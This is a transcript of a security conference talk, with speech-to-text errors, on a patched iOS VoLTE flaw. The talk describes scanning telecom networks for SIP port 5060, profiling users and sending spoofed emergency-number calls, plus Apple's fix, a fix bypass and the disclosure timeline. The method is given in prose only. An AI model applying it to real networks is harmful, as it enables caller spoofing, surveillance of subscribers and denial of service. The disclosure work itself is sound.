Hacking into iOS's VoLTE Implementation

helloo everyone good evening sorry for that uh delay but uh yeah as introduced we are uh we'll be speaking about that we identified in iOS devices with their implementation of voice over LD myself hard and with I have Raj I prominently focus on Telecom security whereas Raj's focus is more on mobile and application security side we both work with K who are uh who are into product development of secure communication products and other appliances so agenda of uh this talk so will we'll go through uh introduction of the Telecom environment uh various components within the Telecom infrastructure also how the mobile device or the user equipment interacts with the Telecom components and how the registration and onboarding uh happens

as well as look at various risk around voiceover LT implementation of the from The Operators side as well as from the uh from the device perspective then we will uh look at the setup that we uh had in our lab in order to ensure that we are able to reproduce the issue that we have identified on the devices and finally coming to the POC and then we'll look at what happened how it happened why it happened which uh rajes will walk you through uh that part then since this is uh Apple we are referring to and uh I'm sure everybody is aware about the disclosure policies of apple and how long does it take for

them to resolve or to how active they are in communicating uh so maybe we'll have some more shed some more light on on that front and then we'll have the floor open for any uh Q&A so before before we proceed and look at the uh infrastructure side of uh the Telecom environment there are certain abbreviations that uh we would you would refer to again and again so ran is the radio access networks these are the cell phone towers which the device connects to behind it is is uh EPC which is evolve packet core this is like the back end or back hole of the entire uh Network where all the components sit uh in the

space HSS is the subscriber server wherein you can also uh you can also imagine this as a database of all the subscriber information including their location what sell Tower they are Ed to what services the subscriber has uh accessed to or they have subscribed to right mme is for uh Mobility management uh which helps in authenticating the device onto the network so the moment you turn on your device when the message goes through it reaches mme and then mme checks with HSS whether the subscriber is part of the network or not and then the servic is established now two components here sgw and uh PGW which is serving Gateway and packet uh Gateway they focus on

delivering the data services to the subscriber so the moment you turn on your 4G data or uh 3G data so in in this we are narrowing ourself only to 4G and 5G uh Network works so the moment you turn on uh your data the traffic is delivered using these two notes also uh to focus here packet Gateway is also responsible on routing your traffic towards the internet or towards other external components within the network so which can be IMS IMS is the core component here that we'll focus on as it is solely responsible for delivering vo or LTE service to the end uh user and cscf are various call functions which are part of the IMs uh Network

which prominently are proxy interrogation and serving so one you can consider the IMs uh as a PBX environment where in you know how in corporate PBX you have sip calls going to the PBX and then PBX does all the routing authentication takes care of that process and then redirects the call to the uh uh the end user right so yeah after the abbreviation we look at the architecture how how the communication happens and how the user is on board it on the network and what component player role in redirecting that traffic so in in this example we are looking at uh 4G uh Network as well as the 5G non Standalone uh Network so when when we talk about 5G on Standalone

Network the backend infrastructure Still Remains the Same as your 4G network the only thing that will change here is from E nodeb it will change to G nodeb I don't know why it is eodb or gdeb it just there uh so yeah so once the user is uh connected the request goes through the mme it then checks with the HSS once it is approved uh the serving Gateway will uh come into picture and then the routing will happen using the packet Gateway which is uh in this case it is packet data uh Network Gateway also known as P Gateway uh pcrf is for policy monitoring whether what what are the limit of data set for that user

or uh basically used for the charging of of the user and then where to route that data to whether that data is towards the internet or towards internal infrastructure is then defined in the P Gateway so in in your device like in your voice over LT enabled device when you look at the cellular configuration on the phone when you select 4G you have also have an option to enable voice over LTE or disable voice over LT right the moment you enable voice over LT all your traffic will then go through the IMs component here right and this is this is where we want to currently Focus on so let's let's look at the uh let's

look at the IMs uh uh infl here wherein the EPC becomes uh transparent in this uh in this scenario the moment you turn on the voice over LTE the first registration package goes to pcsf and then pcsf will do internal routing send it to ICF which will will check with HSS interrogate with s HSS and identify if the user as that service or not and then the uh the serving call function will take it ahead from there right but when when uh this communication happens and when Au when the user is authorized there is an IPC tunnel established between the user equipment and the pcsf or the IMs uh Network various protocols which are involved in this

process is sip sip is a signaling protocol which uh everyone may be uh aware about widely used uh across sdp is uh the protocol which helps in negotiating the multimedia uh session RTP is used to carry the media packet so after the signaling packet is done then the session is handed over to RTP to uh to for the call to establish right after the call is established then the data is transferred on the RTP and the monitoring of the RTP is done using rtcp so these uh with when it comes to Telecom security a lot of Telecom operators they forget to perform any kind of assessment on the volt site or on the Sip side because mostly the

protocol that these guys focus on is ss7 diameter and GTP which are prominently uh now I think there are a lot of measures in securing these protocol and uh they're heavily monitored whereas voice over LT is still not so much monitored and it can be easily accessed just using a SIM card so you don't need to have any special uh EXs or any special uh you know Network to reach to the core infrastructure of the operator but you just need a SIM card and a voice over LT enabled device to do that right we'll look at the registration uh and how with the moment we turn on voice over LT what happens on the on the device and everything is

still on the signaling side so the registration everything is on the signaling side we have not reached on the data uh so far so what the registration packet is sent to pcsf right pcsf will then receive the request forwarded to iccf to verify whether that particular user has access to the service and whether uh if he has yes or no and if if the challenge received is it acceptable or not so once icsf receives it it checks with HSS and then uh the first request always goes as uh 401 on unauthorized through scsf and then when when that message is sent it goes with announce which is then computed by the device using the keys which are existing

in the SIM card and then sent across again through the same process and next uh request we have a 200 okay saying that uh the user is authorized and can have access to uh can utilize voice over LT right and that's when the IPC tunnel is also established now what are what are the issues that can come across in such an netw work first is easily accessible so you have SIM cards widely available uh that you can use at the same time once you start enumeration you will you will see exposure of lot of internal infrastructure being reachable from uh from the user itself now these infrastructure include the uh the IMs infrastructure as well as

all the aggregation points which are available on on the network next you could what you could do is you could send a register and invite package to the IMs itself uh as impersonating yourself as uh any XYZ party and then you start flooding the IMs infrastructure with those uh packets and see if if something clicks like for example if I keep trying to register myself as is rajnish right and if one of the parameter clicks I'm I'm trying to impersonate him on on the device or any of my sub client second uh the third would be to just flood the infrastructure with random uh sip packets which could be for register invite and anything and then

the network will try to process so pcsf would try to process that request and route that request across which will create delays in the network for all the other authorized users who are trying to utilize that service then we could also Target other voice LD users who are connected on the network irrespective on the same Tower same region same uh uh same OU or different uh uh different regions so you could Target all the users irres of where they're located and this is this is what we have uh kind of focused in this uh in in this scenario and last uh you could directly do Bas band fuzing using these techniques wherein you directly interact

with the devices uh uh uh base band and see what what triggers and crash or error or anything on that front but Focus here is targeting other voiceover LTE users to do that we are our setup included uh the implementation of open 5gs which is now uh pretty mature with uh tamilio to use it as the IMs uh in for IMS purpose and to simulate uh 5G and 4G networks we use usrp B210 and blade RF x40 for the LT part uh we had customizable SIM cards which support uh the profile of IMS and then of course we had Target iPhones which had a version of 15. uh below 15 right uh so all all the

iOS uh devices which had version 5050 or less one all impacted since the Inception of the implementation of voice over LT on it and uh so yeah uh then we would have uh Android device Android why because it is very we we get that flexibility of playing around with the uh APN so on your device you have multiple APN configured uh maybe for internet IMS MMS right so the one we are focusing on is the MMS uh is the IMs APN which redirects the traffic to the uh IMS Network and then setting uh rules uh routing rules on the device to ensure that the traffic that is going we are able to intercept the traffic and play

around with it so quick uh demo of uh what happens here on the device so on the right we we have our uh test laptop connected with the uh Android device which is then routing the traffic to the IMs of the uh to the IMs uh code and then reaching back to the iOS uh device right and on the on the left you have uh the logs which are generated from the iPhone device so in in this scenario what we are doing is we are trying to send a spoof Call on a iOS device using Telecom infrastructure as the transit so everything that we do here with the device goes through the Telecom infrastructure but without having any

logs saved on the uh on the Telco side so we are directly triggering the request on the iOS device uh and you could make spoof calls on the device or uh maybe more details can be uh can be shared by rajish here so initial detail what you see here is the uh the interface on the iOS device which is used for uh making an receiving voice overl D calls as well as the server detail as well as the device details of uh uh the iOS where in here the device is using 13.3.1 version and this helps an offens uh offensive uh actor to kind of get a profile on the user who you so what kind

of device that user is using what is the IP address they are on what is their uh mobile number what is their potential location so all that can be achieved using this method and this helps in profiling your Target and when you try to simulate the attack in a production environment you you can enumerate all the voice or LTE devices connected on the operator with their uh iOS versions and then further so you you practically can profile anyone and everyone in this country connected on voice over LT and then it could I don't know it could raise a lot of uh alarm and lot of things can be done based on that information and now I will end it to

so thank you hardik for explaining the entire Telecom back end uh of uh VTE and now we'll try to understand what exactly was happening on the device because that is what we are interested in so before we start on that point you know let's look at the impact of the vulnerability that we identified could have so just imagine everyone of you sitting in this room having an iOS device and suddenly everyone's phone starts ringing at random with say phone phone from police or any emergency service for that matter so the POC that we showed was 100 which is number from police and we can make spoof calls by exploiting the vulnerability so that is one of the impacts then what also you

can do is identify the pi information of the user so that helps in profiling as hardik mentioned and also helps you to get more details about your victim so that could be their exact iOS number their phone numbers their location and whatnot also as hardik mentioned earlier that you can initiate multiple uh requests inside the Telecom infrastructure that would allow us to basically dos the end user equipment and make their uh telephone component inaccessible to anybody who is trying to reach so I can just flood your Tel telephonic component on your device and if somebody is trying to reach you they won't be able to so that can create a state of panic if done on a large

scale and further you can try fuzzing the Sip component and find more visabilities on this but here we'll focus on what we identified how we identified and what did it lead to so this started as a part of an engagement a bigger engagement but we ended up finding this vulnerability like you know this was an unexpected one so when we started interrogating this vulnerability we looked at the V component of the device so on iOS devices there is this Library called com Center which is responsible for handling everything and everything related to Communications say calls and also Wi-Fi and Bluetooth so the specific component that is part of uh com center that is known as IP lip

telephony was responsible for initiating the volt registration phase so what happens when you turn your device on or you just switch it off from the a plane mode so device under goes a sip registration flow as hardik mentioned in one of the earlier uh slides so this is what happens when you turn your device on or initiate AIP registration flow so device initiates a registration Flow by sending off a register packet to the pcsf pcsf is basically a proxy that forwards the request to iccf ICF basically confirms the identity of the subscriber checks it with the Home Server if the identity exist it allows it to access whatever uh component it has access to so we did the same on an iOS device

we hooked the I device to a debugger we were observing the logs and we switched off the airplane mode so when the airplane mode is Switched Off there is this interface on iOS devices that is called PDP ip1 that is triggered and basically the PDP _ ip1 is the interface that is in question here and that is the one that is vulnerable in this case so ip4 ipv4 assignments are carried out and the phone sends a register packet to the IMs cor so when a phone is switched on and it's bought online uh there is this register packet that is sent to IMS Cod utilizing a port 5060 so I'm sure everybody who is looking bug bounties or or anybody who's

run and map any time any point of time in the career would have come across this port because this is a very famous port and it is utilized for all sip Based Services so port number 5060 is utilized and a sip register packet is sent to the IMs core so as we saw in the initial diagram the register packet fails because it is an unauthenticated register packet so so there is a shared secret that is stored inside your sim cards and that shared secret is used to authenticate it with the Home Server so that you can verify the legitimacy of the user who's trying to access the network so first initial register packet fails but the next

register packet is sent back with the nons the nons is verified by the Home Server and then the IPC tunnel is established so regarding the IPC tunnel there is a 3gb guideline that says that if a device is registered on a volt Network and IP SE Tel is established everything and all the communication exiting the device has to be utilized using then utilized using the IPC tunnel so basically IPC tunnel creates an end to end tunnel from the device that is your iPhone to any internal infrastructure and there cannot be any more listening done so what we identified here is iOS devices they do not comply with the 3gpp Norms so the 3gpp Norms as I mentioned says that you

have to terminate the port or the service that is listening to and once the IX tunnel is established just close all the ports so looking at the port scan the com Center Library that we are looking at is still listening for incoming SI packets so this is the interesting part your phone is already registered on the Telecom network phone is able to rece able to make calls and receive calls but it is still listening for incoming say packets so what us as an attacker we were able to do is try to enumerate the device and send a malform packet to that listening service so this was what we did but we thought you know this cannot go wrong because

apple is a very big company and this is a very basic implementation so we tried to verify the same on various other manufacturers that use Android for that matter so we tested Samsung Nexus phones and in those cases once the IP tunnel was established the library responsible for initiating the Sip communication terminated the port and all the communication was taken place through the IPC tunnel so we confirmed our vulnerability that okay there is something wrong what can we do with it so what we did was use a very old friend I'm sure everyone knows what the terminal is that looks like an unmap terminal this is how we start hacking so we ran ran a

mass network skape looking for Port 5060 and to us surprise we were able to enumerate more than a million devices on the Telecom network with the exact iOS number the version that they using and the build number that they using with their phone numbers with their IPs and with their locations so this was interesting and then what we see uh what we tried as I mentioned earlier that we tried sending a malform packet to those identified iOS devices so one of those devices was our device and we knew its IP so we crafted a malicious packet as you can see the user agent is some random user agent the in the call that is initiated is also a spoofed call so

it will show as phone number 1 or police or Emergency Services when we sent the phone as expected responded to that incoming sip packet and initiated a call so on the victim's device you could see a call coming from 1 or any emergency service for that matter and we have uh the wire shark dumps to show that this process was happening and the phone was ringing so you could see in the third block that the phone has initiated a call and it cannot accept any other call unless until this call is terminated so the as mentioned earlier the iOS devices was still listening on the port 5060 which we have highlighted on the top for both TCP and UD

connections and uh the below highlighting basically shows that it's also connected to the IP SEC Tel so this was violating the 3gb guidelines and we went ahead and reported it to Apple and as I'm sure by now you guys have understood the root cause why it was happening and what was the uh issue here so as an attacker having my test laptop connected to the wireless network I was able to make calls to anybody and everybody who's part of my telecom Network and this is what we show here attackers machine using the Telecom Network able to make spoof calls or even get details from uh random victims machine user equipment that is the phone so as

uh security personal or uh security Enthusiast if we know what is the root cause I'm sure is very easy to fix so we knew that the root cause is you just have to close board 5060 once the IP sectoral establishment has done and initiate another uh what is it called another session once the phone is bought back back online after turning it off from the airplane mode so this is a simple fix that was issued by Apple and iOS 15.2 where in the LI I telepone that's the library responsible for handling the calls terminates the IMs TCP socket once the TLs connection between IP SEC tunnel is established and this is this can be seen from the con Center logs and this

has been properly implemented so the issue is fixed now we'll talk a bit about the timeline this was reported to Apple on March 2021 as you know Apple is very notorious to you know work with researchers sometimes so it was very difficult we had a long long conversation history they released a fixed and we were able to by bypass the fix because they were only monitoring one of the interfaces and we could just route the packets through a different interface and issue the calls again so the patch was finally released which basically you know handles all the interfaces that is interacting with the volt component the fix was issued by end of November 2021 and it came out in the public by 2022

and we were awarded a cve that is CV 2021 311 so this was pretty much what we identified and this was our interesting encounter with apple and its V component I would like to end up by saying that you know great things are done by a series of small things brought together so sometimes even the smallest things can cause a massive impact and we just have to keep looking at it thank you